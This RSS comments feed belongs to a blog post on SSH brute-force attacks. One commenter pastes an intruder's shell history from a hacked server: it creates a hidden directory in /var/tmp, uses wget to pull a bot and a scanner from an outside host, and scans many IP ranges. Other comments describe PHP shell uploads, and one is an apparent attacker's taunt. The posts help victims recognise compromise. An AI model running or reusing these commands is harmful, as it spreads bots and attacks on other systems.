<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Anatomy of an SSH Brute Force Dictionary Attack</title>
	<atom:link href="http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/feed/" rel="self" type="application/rss+xml" />
	<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/</link>
	<description>A renaissance view of technology</description>
	<lastBuildDate>Mon, 04 Jul 2011 23:27:58 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
	<item>
		<title>By: piper</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-9329</link>
		<dc:creator>piper</dc:creator>
		<pubDate>Wed, 31 Dec 2008 09:24:48 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-9329</guid>
		<description>Thanks for sharing the information I was actually looking at my SSH logs and decided to do some google searching. I guess that&#039;s one of the problems we faced when sharing a server with other people.</description>
		<content:encoded><![CDATA[<p>Thanks for sharing the information I was actually looking at my SSH logs and decided to do some google searching. I guess that&#8217;s one of the problems we faced when sharing a server with other people.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: F4LL3N</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-3919</link>
		<dc:creator>F4LL3N</dc:creator>
		<pubDate>Mon, 08 Oct 2007 06:24:55 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-3919</guid>
		<description>losers? lol. You sound disgruntled. perhaps you had this same thing happen to you. ;)  Every Hacker exploits (in some form or another) somones stupidity. It could be a hole in a program, or as simple as a No password/crackable ssh login. Not to mention people... these &quot;lamers&quot; (lol ok..) dont need root account to get root account. Many kernels are exploitable to gain root ax by running a simple app. so its not only a root users login u will need to worry about. (obviously)  U get foolish people like Sadox who have had it happen to them, then claim to be the allknowing hacker master. foolish child. and finally, I come to the conclusion of my book.    Please.... do not remove my files from your boxes. Have a pleasent day.</description>
		<content:encoded><![CDATA[<p>losers? lol. You sound disgruntled. perhaps you had this same thing happen to you. <img src='http://brentscheffler.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />   Every Hacker exploits (in some form or another) somones stupidity. It could be a hole in a program, or as simple as a No password/crackable ssh login. Not to mention people&#8230; these &#8220;lamers&#8221; (lol ok..) dont need root account to get root account. Many kernels are exploitable to gain root ax by running a simple app. so its not only a root users login u will need to worry about. (obviously)  U get foolish people like Sadox who have had it happen to them, then claim to be the allknowing hacker master. foolish child. and finally, I come to the conclusion of my book.    Please&#8230;. do not remove my files from your boxes. Have a pleasent day.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sadox</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-1146</link>
		<dc:creator>Sadox</dc:creator>
		<pubDate>Sun, 22 Jul 2007 22:05:35 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-1146</guid>
		<description>God... guys... thos` are not hackers... are &quot;the biggest lamers&quot;... pff i&#039;m so sorry to hear that u call these hackers.... these are nothing more than some losers from IRC@Undernet... they don&#039;t know a shit about linux they just have scanners made by someone else... they use these scanners and they know only a set of commands... they don&#039;t even know how the scanner works exactly... damn.... anyway try to read this : http://unixcod.org/forum/index.php?topic=12.0 - so u don&#039;t have to worry about these pathetic losers in the future.</description>
		<content:encoded><![CDATA[<p>God&#8230; guys&#8230; thos` are not hackers&#8230; are &#8220;the biggest lamers&#8221;&#8230; pff i&#8217;m so sorry to hear that u call these hackers&#8230;. these are nothing more than some losers from IRC@Undernet&#8230; they don&#8217;t know a shit about linux they just have scanners made by someone else&#8230; they use these scanners and they know only a set of commands&#8230; they don&#8217;t even know how the scanner works exactly&#8230; damn&#8230;. anyway try to read this : <a href="http://unixcod.org/forum/index.php?topic=12.0" rel="nofollow">http://unixcod.org/forum/index.php?topic=12.0</a> &#8211; so u don&#8217;t have to worry about these pathetic losers in the future.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: andrew</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-991</link>
		<dc:creator>andrew</dc:creator>
		<pubDate>Mon, 18 Jun 2007 15:57:12 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-991</guid>
		<description>When u see that .. u bet they are some a*sholes exploiting people stupidity. You should never use passwords like root123, 123456, 1q2w3e, abc123 .. etc .. that\\\&#039;s why they get access to your boxes .. user strong passwords like *@Q*ui122 .. and also remove the nologin accounts .. because they can be used by this kids ... they connect to your box using ftp and upload a .php file .. then they run http://ip/~user/file.php (PHP Shell Offender) .. and they can upload bots .. open telnet ports (4040,4000,1414 .. etc) ..</description>
		<content:encoded><![CDATA[<p>When u see that .. u bet they are some a*sholes exploiting people stupidity. You should never use passwords like root123, 123456, 1q2w3e, abc123 .. etc .. that\\\&#8217;s why they get access to your boxes .. user strong passwords like *@Q*ui122 .. and also remove the nologin accounts .. because they can be used by this kids &#8230; they connect to your box using ftp and upload a .php file .. then they run <a href="http://ip/~user/file.php" rel="nofollow">http://ip/~user/file.php</a> (PHP Shell Offender) .. and they can upload bots .. open telnet ports (4040,4000,1414 .. etc) ..</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Zap</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-44</link>
		<dc:creator>Zap</dc:creator>
		<pubDate>Fri, 17 Mar 2006 04:44:50 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-44</guid>
		<description>Another set of commands from my servers history - I think these guys have some pre written script

 624  PATH=&quot;.&quot;
  625  mingetty
  626  exit 0
  627  w
  628  passwd
  629  cat /proc/cpui nfo
  630  cat /proc/cpuinfo
  631  w
  632  uname -a
  633  cat /etc/issue
  634  cd /var/tmp
  635  ls -a
  636  mkdir &quot; &quot;
  637  cd &quot; &quot;
  638  wget belea.idilis.ro/5boti
  639  wget belea.idilis.ro/5boti.tgz
  640  wget belea.idilis.ro/scanner.tgz
  641  tar zxvf 5boti.tgz
  642  rm -rf 5boti.tgz
  643  last
  644  ps -x
  645  ps -aux
  646  id
  647  ls
  648  cd .f
  649  ls
  650  rm -f mech.session
  651  sh
  652  cd ..
  653  ls -a
  654  tar zxvf scanner.tgz
  655  rm -rf scanner.tgz
  656  cd scanner
  657  ls
  658  w
  659  last
  660  ./a 71.243
  661  w
  662  ./a 130.166
  663  w
  664  ls
  665  cat /proc/cpuinfo
  666  ./a 80.43
  667  ./a 141.213
  668  w
  669  w
  670  ./a 132.178
  671  ./a 221.133;./a 80.70;./a 67.70
  672  w
  673  exit
  674  pwd
  675  cd jakarta-tomcat-5.0.28/
  676  ls
  677  cd logs
  678  tail -f catalina.out
  679  exit
  680  w
  681  last
  682  cd /var/tmp
  683  cd .2 &quot;
  684  cd .&quot; &quot;
  685  ls -a
  686  cd &quot; &quot;
  687  ls -a
  688  cd scanner
  689  ls
  690  cat vuln.txt
  691  ./a 213.25
  692  w
  693  ./a 213.255
  694  w
  695  ./a 213.254
  696  w
  697  ./a 213.253
  698  w
  699  ./a 213.7
  700  ./a 84.152
  701  w
  702  ./a 82.200
  703  ./a 82.2
  704  w
  705  ./a 213.55
  706  w
  707  exit
  708  w
  709  ps -x
  710  kill -9 30261
  711  w
  712  ps -x
  713  cd /var/tmp
  714  cd .&quot; &quot;
  715  ls -a
  716  cd &quot; &quot;
  717  ls -a
  718  cd scanner
  719  ls
  720  rm -f 128.21.pscan.22 147.127.pscan.22 171.0.pscan.22 171.1.pscan.22 222.10.pscan.22 222.11.pscan.22 222.12.pscan.22 222.13.pscan.22 222.14.pscan.22
  721  ls
  722  cat vuln.txt
  723  rm -f vuln.txt
  724  ./a 24.31
  725  w
  726  ./a 128.135
  727  w
  728  ./a 219.10
  729  ./a 219.11
  730  ./a 84.223
  731  ./a 84.224
  732  ./a 84.22
  733  ./a 137.28
  734  ./a 130.58
  735  ./a 130.126
  736  ./a 130.122
  737  ./a 140.128
  738  ./a 156.236
  739  ./a 150.210
  740  ./a 150.217
  741  ./a 150.218
  742  w
  743  exit
  744  w
  745  cd /var/tmp
  746  cd .&quot; &quot;
  747  cd &quot; &quot;
  748  cd scanner
  749  ls
  750  rm -f 130.122.pscan.22 150.210.pscan.22 150.218.pscan.22 156.236.pscan.22 219.10.pscan.22 219.11.pscan.22 222.15.pscan.22 23.3.pscan.22 84.224.pscan.22 88.146.pscan.22
  751  cat vuln.txt
  752  tm -f vuln.txt
  753  rm -f vuln.txt
  754  ls
  755  ./a 201.182
  756  ./a 204.52
  757  w
  758  ./a 24.104
  759  w
  760  ./a 81.7
  761  ./a 81.8
  762  w
  763  ./a 199.237
  764  w
  765  exit
  766  w
  767  cd /var/tmp
  768  cd .&quot; &quot;
  769  cd &quot; &quot;
  770  cd scanner
  771  ls
  772  rm -f 199.237.pscan.22 201.182.pscan.22 mfu.txt
  773  ./a 212.182
  774  w
  775  ./a 213.114
  776  w
  777  last
  778  ./a 218.12
  779  ./a 218.13
  780  w
  781  ./a 217.23
  782  ./a 194.254
  783  w
  784  cd ..
  785  ls -a
  786  ftp bama.ua.edu
  787  ls
  788  ftp bama.ua.edu
  789  ls
  790  w
  791  cd scanner
  792  ./a 72.177
  793  ./a 72.178
  794  w
  795  w
  796  uname a
  797  cat /etc/hosts
  798  ./a 60.49
  799  w
  800  ./a 217.204
  801  ./a 207.41
  802  ./a 207.42
  803  w
  804  ./a 63.174
  805  w
  806  ./a 211.21</description>
		<content:encoded><![CDATA[<p>Another set of commands from my servers history &#8211; I think these guys have some pre written script</p>
<p> 624  PATH=&#8221;.&#8221;<br />
  625  mingetty<br />
  626  exit 0<br />
  627  w<br />
  628  passwd<br />
  629  cat /proc/cpui nfo<br />
  630  cat /proc/cpuinfo<br />
  631  w<br />
  632  uname -a<br />
  633  cat /etc/issue<br />
  634  cd /var/tmp<br />
  635  ls -a<br />
  636  mkdir &#8221; &#8221;<br />
  637  cd &#8221; &#8221;<br />
  638  wget belea.idilis.ro/5boti<br />
  639  wget belea.idilis.ro/5boti.tgz<br />
  640  wget belea.idilis.ro/scanner.tgz<br />
  641  tar zxvf 5boti.tgz<br />
  642  rm -rf 5boti.tgz<br />
  643  last<br />
  644  ps -x<br />
  645  ps -aux<br />
  646  id<br />
  647  ls<br />
  648  cd .f<br />
  649  ls<br />
  650  rm -f mech.session<br />
  651  sh<br />
  652  cd ..<br />
  653  ls -a<br />
  654  tar zxvf scanner.tgz<br />
  655  rm -rf scanner.tgz<br />
  656  cd scanner<br />
  657  ls<br />
  658  w<br />
  659  last<br />
  660  ./a 71.243<br />
  661  w<br />
  662  ./a 130.166<br />
  663  w<br />
  664  ls<br />
  665  cat /proc/cpuinfo<br />
  666  ./a 80.43<br />
  667  ./a 141.213<br />
  668  w<br />
  669  w<br />
  670  ./a 132.178<br />
  671  ./a 221.133;./a 80.70;./a 67.70<br />
  672  w<br />
  673  exit<br />
  674  pwd<br />
  675  cd jakarta-tomcat-5.0.28/<br />
  676  ls<br />
  677  cd logs<br />
  678  tail -f catalina.out<br />
  679  exit<br />
  680  w<br />
  681  last<br />
  682  cd /var/tmp<br />
  683  cd .2 &#8221;<br />
  684  cd .&#8221; &#8221;<br />
  685  ls -a<br />
  686  cd &#8221; &#8221;<br />
  687  ls -a<br />
  688  cd scanner<br />
  689  ls<br />
  690  cat vuln.txt<br />
  691  ./a 213.25<br />
  692  w<br />
  693  ./a 213.255<br />
  694  w<br />
  695  ./a 213.254<br />
  696  w<br />
  697  ./a 213.253<br />
  698  w<br />
  699  ./a 213.7<br />
  700  ./a 84.152<br />
  701  w<br />
  702  ./a 82.200<br />
  703  ./a 82.2<br />
  704  w<br />
  705  ./a 213.55<br />
  706  w<br />
  707  exit<br />
  708  w<br />
  709  ps -x<br />
  710  kill -9 30261<br />
  711  w<br />
  712  ps -x<br />
  713  cd /var/tmp<br />
  714  cd .&#8221; &#8221;<br />
  715  ls -a<br />
  716  cd &#8221; &#8221;<br />
  717  ls -a<br />
  718  cd scanner<br />
  719  ls<br />
  720  rm -f 128.21.pscan.22 147.127.pscan.22 171.0.pscan.22 171.1.pscan.22 222.10.pscan.22 222.11.pscan.22 222.12.pscan.22 222.13.pscan.22 222.14.pscan.22<br />
  721  ls<br />
  722  cat vuln.txt<br />
  723  rm -f vuln.txt<br />
  724  ./a 24.31<br />
  725  w<br />
  726  ./a 128.135<br />
  727  w<br />
  728  ./a 219.10<br />
  729  ./a 219.11<br />
  730  ./a 84.223<br />
  731  ./a 84.224<br />
  732  ./a 84.22<br />
  733  ./a 137.28<br />
  734  ./a 130.58<br />
  735  ./a 130.126<br />
  736  ./a 130.122<br />
  737  ./a 140.128<br />
  738  ./a 156.236<br />
  739  ./a 150.210<br />
  740  ./a 150.217<br />
  741  ./a 150.218<br />
  742  w<br />
  743  exit<br />
  744  w<br />
  745  cd /var/tmp<br />
  746  cd .&#8221; &#8221;<br />
  747  cd &#8221; &#8221;<br />
  748  cd scanner<br />
  749  ls<br />
  750  rm -f 130.122.pscan.22 150.210.pscan.22 150.218.pscan.22 156.236.pscan.22 219.10.pscan.22 219.11.pscan.22 222.15.pscan.22 23.3.pscan.22 84.224.pscan.22 88.146.pscan.22<br />
  751  cat vuln.txt<br />
  752  tm -f vuln.txt<br />
  753  rm -f vuln.txt<br />
  754  ls<br />
  755  ./a 201.182<br />
  756  ./a 204.52<br />
  757  w<br />
  758  ./a 24.104<br />
  759  w<br />
  760  ./a 81.7<br />
  761  ./a 81.8<br />
  762  w<br />
  763  ./a 199.237<br />
  764  w<br />
  765  exit<br />
  766  w<br />
  767  cd /var/tmp<br />
  768  cd .&#8221; &#8221;<br />
  769  cd &#8221; &#8221;<br />
  770  cd scanner<br />
  771  ls<br />
  772  rm -f 199.237.pscan.22 201.182.pscan.22 mfu.txt<br />
  773  ./a 212.182<br />
  774  w<br />
  775  ./a 213.114<br />
  776  w<br />
  777  last<br />
  778  ./a 218.12<br />
  779  ./a 218.13<br />
  780  w<br />
  781  ./a 217.23<br />
  782  ./a 194.254<br />
  783  w<br />
  784  cd ..<br />
  785  ls -a<br />
  786  ftp bama.ua.edu<br />
  787  ls<br />
  788  ftp bama.ua.edu<br />
  789  ls<br />
  790  w<br />
  791  cd scanner<br />
  792  ./a 72.177<br />
  793  ./a 72.178<br />
  794  w<br />
  795  w<br />
  796  uname a<br />
  797  cat /etc/hosts<br />
  798  ./a 60.49<br />
  799  w<br />
  800  ./a 217.204<br />
  801  ./a 207.41<br />
  802  ./a 207.42<br />
  803  w<br />
  804  ./a 63.174<br />
  805  w<br />
  806  ./a 211.21</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daniil</title>
		<link>http://brentscheffler.com/blog/2005/11/28/anatomy-of-an-ssh-brute-force-dictionary-attack/#comment-5</link>
		<dc:creator>Daniil</dc:creator>
		<pubDate>Mon, 19 Dec 2005 16:21:41 +0000</pubDate>
		<guid isPermaLink="false">http://brentscheffler.com/blog/?p=11#comment-5</guid>
		<description>Well, thanks a bunch for this. I&#039;ve found your page by looking for vuln.txt and it seems my server was hacked in exactly the same way. Only hacker created a directory &quot; &quot; so I didn&#039;t even see the files at first. Thanks for sharing the info. Its good to know I&#039;m not the only one.</description>
		<content:encoded><![CDATA[<p>Well, thanks a bunch for this. I&#8217;ve found your page by looking for vuln.txt and it seems my server was hacked in exactly the same way. Only hacker created a directory &#8221; &#8221; so I didn&#8217;t even see the files at first. Thanks for sharing the info. Its good to know I&#8217;m not the only one.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

